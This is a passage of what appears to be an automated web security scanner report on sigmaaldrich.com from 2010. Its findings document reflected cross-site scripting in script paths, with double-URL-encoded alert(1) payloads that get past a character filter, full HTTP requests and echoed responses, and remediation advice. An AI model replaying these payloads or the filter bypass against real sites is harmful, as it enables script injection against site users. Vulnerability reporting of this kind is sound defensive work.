This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js926ac%2522%253balert%25281%2529%252f%252f7b2eb5a00c3/globallinks.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js926ac";alert(1)//7b2eb5a00c3/globallinks.js","E404") ;
   </script>
...[SNIP]...

1.518. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/globallinks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92926%2522%253balert%25281%2529%252f%252fb2862eae390 was submitted in the REST URL parameter 2. This input was echoed as 92926";alert(1)//b2862eae390 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/globallinks.js92926%2522%253balert%25281%2529%252f%252fb2862eae390 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/globallinks.js92926";alert(1)//b2862eae390","E404") ;
   </script>
...[SNIP]...

1.519. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/homenav.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b239%2522%253balert%25281%2529%252f%252ff177d83d83c was submitted in the REST URL parameter 1. This input was echoed as 7b239";alert(1)//f177d83d83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js7b239%2522%253balert%25281%2529%252f%252ff177d83d83c/homenav.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js7b239";alert(1)//f177d83d83c/homenav.js","E404") ;
   </script>
...[SNIP]...

1.520. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/homenav.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ccef%2522%253balert%25281%2529%252f%252f8c9f1c754a2 was submitted in the REST URL parameter 2. This input was echoed as 2ccef";alert(1)//8c9f1c754a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/homenav.js2ccef%2522%253balert%25281%2529%252f%252f8c9f1c754a2 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/homenav.js2ccef";alert(1)//8c9f1c754a2","E404") ;
   </script>
...[SNIP]...

1.521. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/jquery-min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a18%2522%253balert%25281%2529%252f%252f552af26323c was submitted in the REST URL parameter 1. This input was echoed as 66a18";alert(1)//552af26323c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js66a18%2522%253balert%25281%2529%252f%252f552af26323c/jquery-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28920


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js66a18";alert(1)//552af26323c/jquery-min.js","E404") ;
   </script>
...[SNIP]...

1.522. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/jquery-min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57259%2522%253balert%25281%2529%252f%252f6f790981f86 was submitted in the REST URL parameter 2. This input was echoed as 57259";alert(1)//6f790981f86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jquery-min.js57259%2522%253balert%25281%2529%252f%252f6f790981f86 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28920


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/jquery-min.js57259";alert(1)//6f790981f86","E404") ;
   </script>
...[SNIP]...

1.523. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/prototype.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 807e4%2522%253balert%25281%2529%252f%252fb5706bee04 was submitted in the REST URL parameter 1. This input was echoed as 807e4";alert(1)//b5706bee04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js807e4%2522%253balert%25281%2529%252f%252fb5706bee04/prototype.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=6d5a5005-61b1-d449-89fd-19f4ff61911c;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js807e4";alert(1)//b5706bee04/prototype.js","E404") ;
   </script>
...[SNIP]...

1.524. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/prototype.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6264a%2522%253balert%25281%2529%252f%252f3de03120ff4 was submitted in the REST URL parameter 2. This input was echoed as 6264a";alert(1)//3de03120ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/prototype.js6264a%2522%253balert%25281%2529%252f%252f3de03120ff4 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=0e1edbac-bc86-6c47-87e7-d9c98ff76a57;Path=/
Content-Length: 28919


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/prototype.js6264a";alert(1)//3de03120ff4","E404") ;
   </script>
...[SNIP]...

1.525. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/scriptaculous.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b4c1%2522%253balert%25281%2529%252f%252f06cb2ec88d6 was submitted in the REST URL parameter 1. This input was echoed as 3b4c1";alert(1)//06cb2ec88d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js3b4c1%2522%253balert%25281%2529%252f%252f06cb2ec88d6/scriptaculous.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=e98ceaf5-3b8a-fc49-890e-4a0af9bd280c;Path=/
Content-Length: 28923


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js3b4c1";alert(1)//06cb2ec88d6/scriptaculous.js","E404") ;
   </script>
...[SNIP]...

1.526. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/scriptaculous.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 218e0%2522%253balert%25281%2529%252f%252f35faeed5d7f was submitted in the REST URL parameter 2. This input was echoed as 218e0";alert(1)//35faeed5d7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/scriptaculous.js218e0%2522%253balert%25281%2529%252f%252f35faeed5d7f HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=04338111-ad87-2147-873c-a88bfc3baea9;Path=/
Content-Length: 28923


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/scriptaculous.js218e0";alert(1)//35faeed5d7f","E404") ;
   </script>
...[SNIP]...

1.527. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/sigma_functions.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf5ee%2522%253balert%25281%2529%252f%252f0adfcf5682a was submitted in the REST URL parameter 1. This input was echoed as bf5ee";alert(1)//0adfcf5682a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsbf5ee%2522%253balert%25281%2529%252f%252f0adfcf5682a/sigma_functions.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=f3d2e628-efc0-904f-8f33-0341edad2066;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsbf5ee";alert(1)//0adfcf5682a/sigma_functions.js","E404") ;
   </script>
...[SNIP]...

1.528. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/sigma_functions.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3553%2522%253balert%25281%2529%252f%252f5a779589bc9 was submitted in the REST URL parameter 2. This input was echoed as f3553";alert(1)//5a779589bc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

